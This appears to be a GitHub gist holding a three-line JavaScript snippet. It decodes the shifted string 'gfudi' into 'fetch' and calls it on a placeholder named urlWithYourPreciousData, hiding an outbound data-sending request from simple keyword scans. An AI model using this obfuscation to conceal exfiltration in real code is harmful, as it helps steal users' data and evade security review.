Skip to content

Instantly share code, notes, and snippets.

@enkot
Created February 27, 2018 06:25
Show Gist options
  • Save enkot/839a48255eb43f87c046e5fbecdcfdab to your computer and use it in GitHub Desktop.
Save enkot/839a48255eb43f87c046e5fbecdcfdab to your computer and use it in GitHub Desktop.
const i = 'gfudi';
const k = s => s.split('').map(c => String.fromCharCode(c.charCodeAt() - 1)).join('');
self[k(i)](urlWithYourPreciousData);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment